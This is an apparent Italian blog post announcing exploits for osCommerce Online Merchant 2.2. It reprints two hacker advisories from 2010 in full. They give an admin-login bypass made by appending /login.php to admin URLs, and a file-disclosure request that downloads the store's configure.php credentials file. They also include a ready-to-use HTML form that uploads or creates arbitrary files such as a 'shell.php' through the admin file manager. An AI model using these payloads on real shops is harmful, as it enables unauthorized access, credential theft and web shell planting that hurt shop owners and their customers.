Due sono gli exploit scoperti a poche ore dell’ultima versione di OScommerce, probabilmente il più noto CMS dedicato al mondo dell’ecomerce e completamente Opern Surce!
Entrambi gli exploit affliggono l’ultima relase 2.2 e permetterebbero l’accesso a file della board con la possibilità di scrittura e la possibilità di visualizzare il pannello di Admin senza credenziali.
Dopo il salto, come di consueto, troverete gli exploi…
Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass
Author : Flyff666 Date : May, 30, 2010 Location : Tangerang, Indonesia Time Zone : GMT +7:00 Software : OsCommerce Online Merchant v2.2 Tested on : All OS -------------------------------------------- Email : [email protected] gReets : Mywisdom(abang.. wkkwkwk), Kiddies, Chaer, Petimati, c4uR WhiteHat, Cruz3n, Gunslinger, v3n0m, z0mb13, Bumble_be Spykit, BobyHikaru, Fribo. all member. Site : Http://www.Devilzc0de.org/forum/ Forum : Http://Indonesianhacker.or.id/ -------------------------------------------- # ByPass Page Admin : You can use this Trick if admin folder not protected by .htaccess if you Want to explore admin page without login. You can use /login.php behind the name of the file Example : http://[site]/admin/backup.php/login.php or http://[site]/admin/file_manager.php/login.php Demo : http://server/store/admin/file_manager.php/login.php You can See all file in Directory Oscommerce.. haha and you can download all file with tRick above # File Disclosure : in : admin/file_manager.php/login.php?action=download&filename= Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
Oscommerce Online Merchant v2.2 – Remote File Upload
______ _ _ _ | ___ \ | | | | (_) | |_/ /_____ _____ | |_ _| |_ _ ___ _ __ | // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \ | |\ \ __/\ V / (_) | | |_| | |_| | (_) | | | | \_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| _____ _____ _____ |_ _| | _ || _ | | | ___ __ _ _ __ ___ | |/' || |_| | | |/ _ \/ _` | '_ ` _ \ | /| |\____ | | | __/ (_| | | | | | | \ |_/ /.___/ / \_/\___|\__,_|_| |_| |_| \___/ \____/ DEFACEMENT it's for script kiddies... _____________________________________________________________ [$] Exploit Title : Oscommerce Online Merchant v2.2 - Remote File Upload [$] Date : 30-05-2010 [$] Author : MasterGipy [$] Email : mastergipy [at] gmail.com [$] Bug : Remote File Upload [$] Vendor : http://www.oscommerce.com [$] Google Dork : n/a [%] vulnerable file: /admin/file_manager.php [REMOTE FILE UPLOAD VULNERABILITY] [$] Exploit: <html><head><title>Oscommerce Online Merchant v2.2 - Remote File Upload </title></head> <br><br><u>UPLOAD FILE:</u><br> <form name="file" action="http://<-- CHANGE HERE -->/admin/file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data"> <input type="file" name="file_1"><br> <input name="submit" type="submit" value=" Upload " > </form> <br><u>CREATE FILE:</u><br> <form name="new_file" action="http://<-- CHANGE HERE -->/admin/file_manager.php/login.php?action=save" method="post"> FILE NAME:<br> <input type="text" name="filename"> (ex. shell.php)<br>FILE CONTENTS:<br> <textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea> <input name="submit" type="submit" value=" Save " > </form> </html> [=] Thanks to Flyff666 for the original exploit: - Oscommerce Online Merchant v2.2 File Disclosure / Admin ByPass [§] Greetings from PORTUGAL ^^